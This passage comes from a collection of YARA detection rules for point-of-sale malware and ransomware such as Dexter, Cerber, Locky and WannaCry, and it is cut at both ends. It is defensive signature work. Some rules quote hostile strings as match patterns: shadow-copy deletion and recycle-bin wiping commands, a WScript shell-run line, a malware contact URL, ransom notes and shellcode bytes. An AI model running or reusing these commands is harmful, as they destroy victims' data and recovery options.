"@patrickrolsen" maltype = "Dexter Malware - StarDust Variant" version = "0.1" description = "Table 2 arbornetworks.com/asert/wp-content/uploads/2013/12/Dexter-and-Project-Hook-Break-the-Bank.pdf" reference = "16b596de4c0e4d2acdfdd6632c80c070, 2afaa709ef5260184cbda8b521b076e1, and e3dd1dc82ddcfaf410372ae7e6b2f658" date = "12/30/2013" strings: $s1 = "ceh_3\\.\\ceh_4\\..\\ceh_6" $s2 = "Yatoed3fe3rex23030am39497403" $s3 = "Poo7lo276670173quai16568unto1828Oleo9eds96006nosysump7hove19" $s4 = "CommonFile.exe" condition: uint16(0) == 0x5A4D and all of ($s*) } rule pos_malware_project_hook { meta: author = "@patrickrolsen" maltype = "Project Hook" version = "0.1" description = "Table 1 arbornetworks.com/asert/wp-content/uploads/2013/12/Dexter-and-Project-Hook-Break-the-Bank.pdf" reference = "759154d20849a25315c4970fe37eac59" date = "12/30/2013" strings: $s1 = "CallImage.exe" $s2 = "BurpSwim" $s3 = "Work\\Project\\Load" $s4 = "WortHisnal" condition: uint16(0) == 0x5A4D and all of ($s*) } rule pdb_strings_Rescator { meta: author = "@patrickrolsen" maltype = "Target Attack" version = "0.3" description = "Rescator PDB strings within binaries" date = "01/30/2014" strings: $pdb1 = "\\Projects\\Rescator" nocase condition: uint16(0) == 0x5A4D and $pdb1 } rule pos_uploader { meta: author = "@patrickrolsen" maltype = "Point of Sale (POS) Malware" reference = "http://blogs.mcafee.com/mcafee-labs/analyzing-the-target-point-of-sale-malware" version = "0.1" description = "Testing the base64 encoded file in sys32" date = "01/30/2014" strings: $s1 = "cmd /c net start %s" $s2 = "ftp -s:%s" $s3 = "data_%d_%d_%d_%d_%d.txt" $s4 = "\\uploader\\" condition: uint16(0) == 0x5A4D and all of ($s*) } rule winxml_dll { meta: author = "@patrickrolsen" maltype = "Point of Sale (POS) Malware" reference = "ce0296e2d77ec3bb112e270fc260f274" version = "0.1" description = "Testing the base64 encoded file in sys32" date = "01/30/2014" strings: $s1 = "\\system32\\winxml.dll" //$s2 = "cmd /c net start %s" //$s3 = "=== pid:" //$s4 = "GOTIT" //$s5 = ".memdump" //$s6 = "POSWDS" condition: uint16(0) == 0x5A4D and (all of ($s*)) } rule pos_chewbacca { meta: author = "@patrickrolsen" maltype = "Point of Sale (POS) Malware" reference = "https://www.securelist.com/en/blog/208214185/ChewBacca_a_new_episode_of_Tor_based_Malware" hashes = "21f8b9d9a6fa3a0cd3a3f0644636bf09, 28bc48ac4a92bde15945afc0cee0bd54" version = "0.2" description = "Testing the base64 encoded file in sys32" date = "01/30/2014" strings: $s1 = "tor -f <torrc>" $s2 = "tor_" $s3 = "umemscan" $s4 = "CHEWBAC" condition: uint16(0) == 0x5A4D and (all of ($s*)) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule BernhardPOS { meta: author = "Nick Hoffman / Jeremy Humble" last_update = "2015-07-14" source = "Morphick Inc." description = "BernhardPOS Credit Card dumping tool" reference = "http://morphick.com/blog/2015/7/14/bernhardpos-new-pos-malware-discovered-by-morphick" md5 = "e49820ef02ba5308ff84e4c8c12e7c3d" score = 70 strings: $shellcode_kernel32_with_junk_code = { 33 c0 83 ?? ?? 83 ?? ?? 64 a1 30 00 00 00 83 ?? ?? 83 ?? ?? 8b 40 0c 83 ?? ?? 83 ?? ?? 8b 40 14 83 ?? ?? 83 ?? ?? 8b 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 8b 00 83 ?? ?? 83 ?? ?? 8b 40 10 83 ?? ?? } $mutex_name = "OPSEC_BERNHARD" $build_path = "C:\\bernhard\\Debug\\bernhard.pdb" $string_decode_routine = { 55 8b ec 83 ec 50 53 56 57 a1 ?? ?? ?? ?? 89 45 f8 66 8b 0d ?? ?? ?? ?? 66 89 4d fc 8a 15 ?? ?? ?? ?? 88 55 fe 8d 45 f8 50 ff ?? ?? ?? ?? ?? 89 45 f0 c7 45 f4 00 00 00 00 ?? ?? 8b 45 f4 83 c0 01 89 45 f4 8b 45 08 50 ff ?? ?? ?? ?? ?? 39 45 f4 ?? ?? 8b 45 08 03 45 f4 0f be 08 8b 45 f4 99 f7 7d f0 0f be 54 15 f8 33 ca 8b 45 08 03 45 f4 88 08 ?? ?? 5f 5e 5b 8b e5 5d } condition: any of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule POS_bruteforcing_bot { meta: maltype = "botnet" ref = "https://github.com/reed1713" reference = "http://www.alienvault.com/open-threat-exchange/blog/botnet-bruteforcing-point-of-sale-via-remote-desktop" date = "3/11/2014" description = "botnet bruteforcing POS terms via RDP" strings: $type="Microsoft-Windows-Security-Auditing" $eventid="4688" $data="\\AppData\\Roaming\\lsacs.exe" condition: all of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule easterjackpos { meta: author = "Brian Wallace @botnet_hunter" author_email = "bwall@ballastsecurity.net" date = "2014-09-02" description = "Identify JackPOS" strings: $s1 = "updateinterval=" $s2 = "cardinterval=" $s3 = "{[!17!]}{[!18!]}" condition: all of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule PoS_Malware_fastpos : FastPOS POS keylogger { meta: author = "Trend Micro, Inc." date = "2016-05-18" description = "Used to detect FastPOS keyloggger + scraper" reference = "http://documents.trendmicro.com/assets/fastPOS-quick-and-easy-credit-card-theft.pdf" sample_filetype = "exe" strings: $string1 = "uniqyeidclaxemain" $string2 = "http://%s/cdosys.php" $string3 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion" $string4 = "\\The Hook\\Release\\The Hook.pdb" nocase condition: all of ($string*) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" rule LogPOS { meta: author = "Morphick Security" description = "Detects Versions of LogPOS" md5 = "af13e7583ed1b27c4ae219e344a37e2b" strings: $mailslot = "\\\\.\\mailslot\\LogCC" $get = "GET /%s?encoding=%c&t=%c&cc=%I64d&process=" //64A130000000 mov eax, dword ptr fs:[0x30] //8B400C mov eax, dword ptr [eax + 0xc] //8B401C mov eax, dword ptr [eax + 0x1c] //8B4008 mov eax, dword ptr [eax + 8] $sc = {64 A1 30 00 00 00 8B 40 0C 8B 40 1C 8B 40 08 } condition: $sc and 1 of ($mailslot,$get) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" rule PoS_Malware_MalumPOS { meta: author = "Trend Micro, Inc." date = "2015-05-25" description = "Used to detect MalumPOS memory dumper" sample_filtype = "exe" strings: $string1 = "SOFTWARE\\Borland\\Delphi\\RTL" $string2 = "B)[0-9]{13,19}\\" $string3 = "[A-Za-z\\s]{0,30}\\/[A-Za-z\\s]{0,30}\\" $string4 = "TRegExpr(exec): ExecNext Without Exec[Pos]" $string5 = /Y:\\PROGRAMS\\.{20,300}\.pas/ condition: all of ($string*) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule Mozart { meta: author = "Nick Hoffman - Morphick Inc" description = "Detects samples of the Mozart POS RAM scraping utility" reference = "http://securitykitten.github.io/the-mozart-ram-scraper/" strings: $pdb = "z:\\Slender\\mozart\\mozart\\Release\\mozart.pdb" nocase wide ascii $output = {67 61 72 62 61 67 65 2E 74 6D 70 00} $service_name = "NCR SelfServ Platform Remote Monitor" nocase wide ascii $service_name_short = "NCR_RemoteMonitor" $encode_data = {B8 08 10 00 00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 53 55 8B AC 24 14 10 00 00 89 84 24 0C 10 00 00 56 8B C5 33 F6 33 DB 8D 50 01 8D A4 24 00 00 00 00 8A 08 40 84 C9 ?? ?? 2B C2 89 44 24 0C ?? ?? 8B 94 24 1C 10 00 00 57 8B FD 2B FA 89 7C 24 10 ?? ?? 8B 7C 24 10 8A 04 17 02 86 E0 BA 40 00 88 02 B8 ?? ?? ?? ?? 46 8D 78 01 8D A4 24 00 00 00 00 8A 08 40 84 C9 ?? ?? 2B C7 3B F0 ?? ?? 33 F6 8B C5 43 42 8D 78 01 8A 08 40 84 C9 ?? ?? 2B C7 3B D8 ?? ?? 5F 8B B4 24 1C 10 00 00 8B C5 C6 04 33 00 8D 50 01 8A 08 40 84 C9 ?? ?? 8B 8C 24 20 10 00 00 2B C2 51 8D 54 24 14 52 50 56 E8 ?? ?? ?? ?? 83 C4 10 8B D6 5E 8D 44 24 0C 8B C8 5D 2B D1 5B 8A 08 88 0C 02 40 84 C9 ?? ?? 8B 8C 24 04 10 00 00 E8 ?? ?? ?? ?? 81 C4 08 10 00 00} condition: any of ($pdb, $output, $encode_data) or all of ($service*) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule Ransom_CryptXXX_Dropper { /* Regla para detectar el dropper de Ransom.CryptXXX con MD5 d01fd2bb8c6296d51be297978af8b3a1 */ meta: description = "Regla para detectar RANSOM.CRYPTXXX" author = "CCN-CERT" version = "1.0" ref = "https://www.ccn-cert.cni.es/seguridad-al-dia/comunicados-ccn-cert/4002-publicado-el-informe-del-codigo-danino-ransom-cryptxxx.html" strings: $a = { 50 65 31 57 58 43 46 76 59 62 48 6F 35 } $b = { 43 00 3A 00 5C 00 42 00 49 00 45 00 52 00 5C 00 51 00 6D 00 6B 00 4E 00 52 00 4C 00 46 00 00 } condition: all of them } rule Ransom_CryptXXX_Real { /* Regla para detectar el codigo Ransom.CryptXXX fuera del dropper con MD5 ae06248ab3c02e1c2ca9d53b9a155199 */ meta: description = "Regla para detectar Ransom.CryptXXX original" author = "CCN-CERT" version = "1.0" ref = "https://www.ccn-cert.cni.es/seguridad-al-dia/comunicados-ccn-cert/4002-publicado-el-informe-del-codigo-danino-ransom-cryptxxx.html" strings: $a = { 52 59 47 40 4A 41 59 5D 52 00 00 00 FF FF FF FF } $b = { 06 00 00 00 52 59 47 40 40 5A 00 00 FF FF FF FF } $c = { 0A 00 00 00 52 5C 4B 4D 57 4D 42 4B 5C 52 00 00 } $d = { FF FF FF FF 0A 00 00 00 52 5D 57 5D 5A 4B 43 70 } $e = { 3F 52 00 00 FF FF FF FF 06 00 00 00 52 4C 41 41 } $f = { 5A 52 00 00 FF FF FF FF 0A 00 00 00 52 5C 4B 4D } $g = { 41 58 4B 5C 57 52 00 00 FF FF FF FF 0E 00 00 00 } $h = { 52 2A 5C 4B 4D 57 4D 42 4B 20 4C 47 40 52 00 00 } $i = { FF FF FF FF 0A 00 00 00 52 5E 4B 5C 48 42 41 49 } $j = { 5D 52 00 00 FF FF FF FF 05 00 00 00 52 4B 48 47 } $k = { 52 00 00 00 FF FF FF FF 0C 00 00 00 52 4D 41 40 } $l = { 48 47 49 20 43 5D 47 52 00 00 00 00 FF FF FF FF } $m = { 0A 00 00 00 52 5E 5C 41 49 5C 4F 70 3F 52 00 00 } $n = { FF FF FF FF 0A 00 00 00 52 5E 5C 41 49 5C 4F 70 } $o = { 3C 52 00 00 FF FF FF FF 08 00 00 00 52 49 41 41 } $p = { 49 42 4B 52 00 00 00 00 FF FF FF FF 06 00 00 00 } $q = { 52 5A 4B 43 5E 52 00 00 FF FF FF FF 08 00 00 00 } $v = { 52 48 3A 4C 4D 70 3F 52 00 00 00 00 FF FF FF FF } $w = { 0A 00 00 00 52 4F 42 42 5B 5D 4B 70 3F 52 00 00 } $x = { FF FF FF FF 0A 00 00 00 52 5E 5C 41 49 5C 4F 70 } $y = { 3F 52 00 00 FF FF FF FF 0A 00 00 00 52 5E 5C 41 } $z = { 49 5C 4F 70 3C 52 00 00 FF FF FF FF 09 00 00 00 } $aa = { 52 4F 5E 5E 4A 4F 5A 4F 52 00 00 00 FF FF FF FF } $ab = { 0A 00 00 00 52 5E 5C 41 49 5C 4F 70 3D 52 00 00 } $ac = { FF FF FF FF 08 00 00 00 52 5E 5B 4C 42 47 4D 52 } condition: all of them } rule legion_777 { meta: author = "Daxda (https://github.com/Daxda)" date = "2016/6/6" description = "Detects an UPX-unpacked .777 ransomware binary." ref = "https://github.com/Daxda/malware-analysis/tree/master/malware_samples/legion" category = "Ransomware" sample = "SHA256: 14d22359e76cf63bf17268cad24bac03663c8b2b8028b869f5cec10fe3f75548" strings: $s1 = "http://tuginsaat.com/wp-content/themes/twentythirteen/stats.php" $s2 = "read_this_file.txt" wide // Ransom note filename. $s3 = "seven_legion@india.com" // Part of the format string used to rename files. $s4 = {46 4f 52 20 44 45 43 52 59 50 54 20 46 49 4c 45 53 0d 0a 53 45 4e 44 20 4f 4e 45 20 46 49 4c 45 20 49 4e 20 45 2d 4d 41 49 4c 0d 0a 73 65 76 65 6e 5f 6c 65 67 69 6f 6e 40 69 6e 64 69 61 2e 63 6f 6d } // Ransom note content. $s5 = "%s._%02i-%02i-%02i-%02i-%02i-%02i_$%s$.777" // Renaming format string. condition: 4 of ($s*) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule Ransom_Alpha { meta: description = "Regla para detectar Ransom.Alpha (posibles falsos positivos)" author = "CCN-CERT" version = "1.0" strings: $a = { 52 00 65 00 61 00 64 00 20 00 4D 00 65 00 20 00 28 00 48 00 6F 00 77 00 20 00 44 00 65 00 63 } condition: $a } rule Ransom_Alfa { meta: description = "Regla para detectar W32/Filecoder.Alfa (Posibles falsos positivos)" author = "CCN-CERT" version = "1.0" strings: $a = { 8B 0C 97 81 E1 FF FF 00 00 81 F9 19 04 00 00 74 0F 81 F9 } $b = { 22 04 00 00 74 07 42 3B D0 7C E2 EB 02 } condition: all of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule cerber3{ meta: author = "pekeinfo" date = "2016-09-09" description = "Cerber3 " strings: $a = {00 6A 00 68 80 00 00 00 6A 03 6A 00 6A 03 6A 01 8B 85} $b = {68 3B DB 00 00 ?? ?? ?? ?? 00 ?? FF 15} condition: 1 of them } rule cerber4{ meta: author = "pekeinfo" date = "2016-09-09" description = "Cerber4" strings: $a = {8B 0D ?? ?? 43 00 51 8B 15 ?? ?? 43 00 52 E8 C9 04 00 00 83 C4 08 89 45 FC A1 ?? ?? 43 00 3B 05 ?? ?? 43 00 72 02} condition: 1 of them } rule cerber5{ meta: author = "pekeinfo" date = "2016-12-02" description = "Cerber5" strings: $a = {83 C4 04 A3 ?? ?? ?? 00 C7 45 ?? ?? ?? ?? 00 8B ?? ?? C6 0? 56 8B ?? ?? 5? 68 ?? ?? 4? 00 FF 15 ?? ?? 4? 00 50 FF 15 ?? ?? 4? 00 A3 ?? ?? 4? 00 68 1D 10 00 00 E8 ?? ?? FF FF 83 C4 04 ?? ?? ??} condition: 1 of them } rule cerber5b{ meta: author = "pekeinfo" date = "2016-12-20" description = "Cerber5b" strings: $a={8B ?? ?8 ?? 4? 00 83 E? 02 89 ?? ?8 ?? 4? 00 68 ?C ?9 4? 00 [0-6] ?? ?? ?? ?? ?? ?8 ?? 4? 00 5? FF 15 ?? ?9 4? 00 89 45 ?4 83 7D ?4 00 75 02 EB 12 8B ?? ?0 83 C? 06 89 ?? ?0 B? DD 03 00 00 85} condition: $a } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule ransom_comodosec_mrcr1 { meta: author = " J from THL <j@techhelplist.com>" date = "2017/01" reference = "https://virustotal.com/en/file/75c82fd18fcf8a51bc1b32a89852d90978fa5e7a55281f42b0a1de98d14644fa/analysis/" version = 1 maltype = "Ransomware" filetype = "memory" strings: $text01 = "WebKitFormBoundary" $text02 = "Start NetworkScan" $text03 = "Start DriveScan" $text04 = "Start CryptFiles" $text05 = "cmd /c vssadmin delete shadows /all /quiet" $text06 = "isAutorun:" $text07 = "isNetworkScan:" $text08 = "isUserDataLast:" $text09 = "isCryptFileNames:" $text10 = "isChangeFileExts:" $text11 = "isPowerOffWindows:" $text12 = "GatePath:" $text13 = "GatePort:" $text14 = "DefaultCryptKey:" $text15 = "UserAgent:" $text16 = "Mozilla_" $text17 = "On Error Resume Next" $text18 = "Content-Disposition: form-data; name=\"uid\"" $text19 = "Content-Disposition: form-data; name=\"uname\"" $text20 = "Content-Disposition: form-data; name=\"cname\"" $regx21 = /\|[0-9a-z]{2,5}\|\|[0-9a-z]{2,5}\|\|[0-9a-z]{2,5}\|\|[0-9a-z]{2,5}\|/ condition: 10 of them } rule Ransom : Crypren{ meta: weight = 1 Author = "@pekeinfo" reference = "https://github.com/pekeinfo/DecryptCrypren" strings: $a = "won't be able to recover your files anymore.</p>" $b = {6A 03 68 ?? ?? ?? ?? B9 74 F1 AE 00 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 98 3A 00 00 FF D6 6A 00 68 ?? ?? ?? ?? 68 ?? ?? ?? ??} $c = "Please restart your computer and wait for instructions for decrypting your files" condition: any of them } rule cryptonar_ransomware { meta: description = "Rule to detect CryptoNar Ransomware" author = "Marc Rivero | @seifreed" reference = "https://www.bleepingcomputer.com/news/security/cryptonar-ransomware-discovered-and-quickly-decrypted/" strings: $s1 = "C:\\narnar\\CryptoNar\\CryptoNarDecryptor\\obj\\Debug\\CryptoNar.pdb" fullword ascii $s2 = "CryptoNarDecryptor.exe" fullword wide $s3 = "server will eliminate the key after 72 hours since its generation (since the moment your computer was infected). Once this has " fullword ascii $s4 = "Do not delete this file, else the decryption process will be broken" fullword wide $s5 = "key you received, and wait until the decryption process is done." fullword ascii $s6 = "In order to receive your decryption key, you will have to pay $200 in bitcoins to this bitcoin address: [bitcoin address]" fullword ascii $s7 = "Decryption process failed" fullword wide $s8 = "CryptoNarDecryptor.KeyValidationWindow.resources" fullword ascii $s9 = "Important note: Removing CryptoNar will not restore access to your encrypted files." fullword ascii $s10 = "johnsmith987654@tutanota.com" fullword wide $s11 = "Decryption process will start soon" fullword wide $s12 = "CryptoNarDecryptor.DecryptionProgressBarForm.resources" fullword ascii $s13 = "DecryptionProcessProgressBar" fullword wide $s14 = "CryptoNarDecryptor.Properties.Resources.resources" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 2000KB) and all of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" rule CryptoLocker_set1 { meta: author = "Christiaan Beek, Christiaan_Beek@McAfee.com" date = "2014-04-13" description = "Detection of Cryptolocker Samples" strings: $string0 = "static" $string1 = " kscdS" $string2 = "Romantic" $string3 = "CompanyName" wide $string4 = "ProductVersion" wide $string5 = "9%9R9f9q9" $string6 = "IDR_VERSION1" wide $string7 = " </trustInfo>" $string8 = "LookFor" wide $string9 = ":n;t;y;" $string10 = " <requestedExecutionLevel level" $string11 = "VS_VERSION_INFO" wide $string12 = "2.0.1.0" wide $string13 = "<assembly xmlns" $string14 = " <trustInfo xmlns" $string15 = "srtWd@@" $string16 = "515]5z5" $string17 = "C:\\lZbvnoVe.exe" wide condition: 12 of ($string*) } rule CryptoLocker_rule2 { meta: author = "Christiaan Beek, Christiaan_Beek@McAfee.com" date = "2014-04-14" description = "Detection of CryptoLocker Variants" strings: $string0 = "2.0.1.7" wide $string1 = " <security>" $string2 = "Romantic" $string3 = "ProductVersion" wide $string4 = "9%9R9f9q9" $string5 = "IDR_VERSION1" wide $string6 = "button" $string7 = " </security>" $string8 = "VFileInfo" wide $string9 = "LookFor" wide $string10 = " </requestedPrivileges>" $string11 = " uiAccess" $string12 = " <trustInfo xmlns" $string13 = "last.inf" $string14 = " manifestVersion" $string15 = "FFFF04E3" wide $string16 = "3,31363H3P3m3u3z3" condition: 12 of ($string*) } rule SVG_LoadURL { meta: description = "Detects a tiny SVG file that loads an URL (as seen in CryptoWall malware infections)" author = "Florian Roth" reference = "http://goo.gl/psjCCc" date = "2015-05-24" hash1 = "ac8ef9df208f624be9c7e7804de55318" hash2 = "3b9e67a38569ebe8202ac90ad60c52e0" hash3 = "7e2be5cc785ef7711282cea8980b9fee" hash4 = "4e2c6f6b3907ec882596024e55c2b58b" score = 50 strings: $s1 = "</svg>" nocase $s2 = "<script>" nocase $s3 = "location.href='http" nocase condition: all of ($s*) and filesize < 600 } rule BackdoorFCKG: CTB_Locker_Ransomware { meta: author = "ISG" date = "2015-01-20" reference = "https://blogs.mcafee.com/mcafee-labs/rise-backdoor-fckq-ctb-locker" description = "CTB_Locker" strings: $string0 = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" $stringl = "RNDBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" $string2 = "keme132.DLL" $string3 = "klospad.pdb" condition: 3 of them } //more info at reversecodes.wordpress.com rule DMALocker : ransom { meta: Description = "Deteccion del ransomware DMA Locker desde la version 1.0 a la 4.0" ref = "https://blog.malwarebytes.org/threat-analysis/2016/02/dma-locker-a-new-ransomware-but-no-reason-to-panic/" Author = "SadFud" Date = "30/05/2016" strings: $uno = { 41 42 43 58 59 5a 31 31 } $dos = { 21 44 4d 41 4c 4f 43 4b } $tres = { 21 44 4d 41 4c 4f 43 4b 33 2e 30 } $cuatro = { 21 44 4d 41 4c 4f 43 4b 34 2e 30 } condition: any of them } //More at reversecodes.wordpress.com rule DMALocker4 : ransom { meta: Description = "Deteccion del ransomware DMA Locker version 4.0" ref = "https://blog.malwarebytes.org/threat-analysis/2016/02/dma-locker-a-new-ransomware-but-no-reason-to-panic/" Author = "SadFud" Date = "30/05/2016" Hash = "e3106005a0c026fc969b46c83ce9aeaee720df1bb17794768c6c9615f083d5d1" strings: $clave = { 21 44 4d 41 4c 4f 43 4b 34 2e 30 } condition: $clave } rule DoublePulsarXor_Petya { meta: description = "Rule to hit on the XORed DoublePulsar shellcode" author = "Patrick Jones" company = "Booz Allen Hamilton" reference1 ="https://www.boozallen.com/s/insight/publication/the-petya-ransomware-outbreak.html" reference2 = "https://www.boozallen.com/content/dam/boozallen_site/sig/pdf/white-paper/rollup-of-booz-allen-petya-research.pdf" date = "2017-06-28" hash = "027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745" hash = "64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1" strings: $DoublePulsarXor_Petya = { FD 0C 8C 5C B8 C4 24 C5 CC CC CC 0E E8 CC 24 6B CC CC CC 0F 24 CD CC CC CC 27 5C 97 75 BA CD CC CC C3 FE } condition: $DoublePulsarXor_Petya } rule DoublePulsarDllInjection_Petya { meta: description = "Rule to hit on the XORed DoublePulsar DLL injection shellcode" author = "Patrick Jones" company = "Booz Allen Hamilton" reference1 ="https://www.boozallen.com/s/insight/publication/the-petya-ransomware-outbreak.html" reference2 = "https://www.boozallen.com/content/dam/boozallen_site/sig/pdf/white-paper/rollup-of-booz-allen-petya-research.pdf" date = "2017-06-28" hash = "027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745" hash = "64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1" strings: $DoublePulsarDllInjection_Petya = { 45 20 8D 93 8D 92 8D 91 8D 90 92 93 91 97 0F 9F 9E 9D 99 84 45 29 84 4D 20 CC CD CC CC 9B 84 45 03 84 45 14 84 45 49 CC 33 33 33 24 77 CC CC CC 84 45 49 C4 33 33 33 24 84 CD CC CC 84 45 49 DC 33 33 33 84 47 49 CC 33 33 33 84 47 41 } condition: $DoublePulsarDllInjection_Petya } rule Erebus: ransom { meta: description = "Erebus Ransomware" author = "Joan Soriano / @joanbtl" date = "2017-06-23" version = "1.0" MD5 = "27d857e12b9be5d43f935b8cc86eaabf" SHA256 = "0b7996bca486575be15e68dba7cbd802b1e5f90436ba23f802da66292c8a055f" ref1 = "http://blog.trendmicro.com/trendlabs-security-intelligence/erebus-resurfaces-as-linux-ransomware/" strings: $a = "/{5f58d6f0-bb9c-46e2-a4da-8ebc746f24a5}//log.log" $b = "EREBUS IS BEST." condition: all of them } rule crime_ransomware_windows_GPGQwerty: crime_ransomware_windows_GPGQwerty { meta: author = "McAfee Labs" description = "Detect GPGQwerty ransomware" reference = "https://securingtomorrow.mcafee.com/mcafee-labs/ransomware-takes-open-source-path-encrypts-gnu-privacy-guard/" strings: $a = "gpg.exe –recipient qwerty -o" $b = "%s%s.%d.qwerty" $c = "del /Q /F /S %s$recycle.bin" $d = "cryz1@protonmail.com" condition: all of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule GoldenEye_Ransomware_XLS { meta: description = "GoldenEye XLS with Macro - file Schneider-Bewerbung.xls" author = "Florian Roth" reference = "https://goo.gl/jp2SkT" date = "2016-12-06" hash1 = "2320d4232ee80cc90bacd768ba52374a21d0773c39895b88cdcaa7782e16c441" strings: $x1 = "fso.GetTempName();tmp_path = tmp_path.replace('.tmp', '.exe')" fullword ascii $x2 = "var shell = new ActiveXObject('WScript.Shell');shell.run(t'" fullword ascii condition: ( uint16(0) == 0xcfd0 and filesize < 4000KB and 1 of them ) } rule GoldenEyeRansomware_Dropper_MalformedZoomit { meta: description = "Auto-generated rule - file b5ef16922e2c76b09edd71471dd837e89811c5e658406a8495c1364d0d9dc690" author = "Florian Roth" reference = "https://goo.gl/jp2SkT" date = "2016-12-06" hash1 = "b5ef16922e2c76b09edd71471dd837e89811c5e658406a8495c1364d0d9dc690" strings: $s1 = "ZoomIt - Sysinternals: www.sysinternals.com" fullword ascii $n1 = "Mark Russinovich" wide condition: ( uint16(0) == 0x5a4d and filesize < 800KB and $s1 and not $n1 ) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ /* Yara Rule Set Author: Florian Roth Date: 2016-02-17 Identifier: Locky */ rule Locky_Ransomware : ransom { meta: description = "Detects Locky Ransomware (matches also on Win32/Kuluoz)" author = "Florian Roth (with the help of binar.ly)" reference = "https://goo.gl/qScSrE" date = "2016-02-17" hash = "5e945c1d27c9ad77a2b63ae10af46aee7d29a6a43605a9bfbf35cebbcff184d8" strings: $o1 = { 45 b8 99 f7 f9 0f af 45 b8 89 45 b8 } // address=0x4144a7 $o2 = { 2b 0a 0f af 4d f8 89 4d f8 c7 45 } // address=0x413863 condition: all of ($o*) } rule Locky_Ransomware_2: ransom { meta: description = "Regla para detectar RANSOM.LOCKY" author = "CCN-CERT" version = "1.0" strings: $a1 = { 2E 00 6C 00 6F 00 63 00 6B 00 79 00 00 } $a2 = { 00 5F 00 4C 00 6F 00 63 00 6B 00 79 00 } $a3 = { 5F 00 72 00 65 00 63 00 6F 00 76 00 65 } $a4 = { 00 72 00 5F 00 69 00 6E 00 73 00 74 00 } $a5 = { 72 00 75 00 63 00 74 00 69 00 6F 00 6E } $a6 = { 00 73 00 2E 00 74 00 78 00 74 00 00 } $a7 = { 53 6F 66 74 77 61 72 65 5C 4C 6F 63 6B 79 00 } condition: all of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" rule MS17_010_WanaCry_worm { meta: description = "Worm exploiting MS17-010 and dropping WannaCry Ransomware" author = "Felipe Molina (@felmoltor)" reference = "https://www.exploit-db.com/exploits/41987/" date = "2017/05/12" strings: $ms17010_str1="PC NETWORK PROGRAM 1.0" $ms17010_str2="LANMAN1.0" $ms17010_str3="Windows for Workgroups 3.1a" $ms17010_str4="__TREEID__PLACEHOLDER__" $ms17010_str5="__USERID__PLACEHOLDER__" $wannacry_payload_substr1 = "h6agLCqPqVyXi2VSQ8O6Yb9ijBX54j" $wannacry_payload_substr2 = "h54WfF9cGigWFEx92bzmOd0UOaZlM" $wannacry_payload_substr3 = "tpGFEoLOU6+5I78Toh/nHs/RAP" condition: all of them } /* Four YARA rules to check for payloads on systems. Thanks to sinkholing, encyrption may not occur, BUT you may still have binaries lying around. If you get a match for "WannaDecryptor" and not for Wanna_Sample, then you may have a variant! Check out http://yara.readthedocs.io on how to write and add a rule as below and index your rule by the sample hashes. Add, share, rinse and repeat! */ rule WannaDecryptor: WannaDecryptor { meta: description = "Detection for common strings of WannaDecryptor" strings: $id1 = "taskdl.exe" $id2 = "taskse.exe" $id3 = "r.wnry" $id4 = "s.wnry" $id5 = "t.wnry" $id6 = "u.wnry" $id7 = "msg/m_" condition: 3 of them } rule Wanna_Sample_84c82835a5d21bbcf75a61706d8ab549: Wanna_Sample_84c82835a5d21bbcf75a61706d8ab549 { meta: description = "Specific sample match for WannaCryptor" MD5 = "84c82835a5d21bbcf75a61706d8ab549" SHA1 = "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" SHA256 = "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" INFO = "Looks for 'taskdl' and 'taskse' at known offsets" strings: $taskdl = { 00 74 61 73 6b 64 6c } $taskse = { 00 74 61 73 6b 73 65 } condition: $taskdl at 3419456 and $taskse at 3422953 } rule Wanna_Sample_4da1f312a214c07143abeeafb695d904: Wanna_Sample_4da1f312a214c07143abeeafb695d904 { 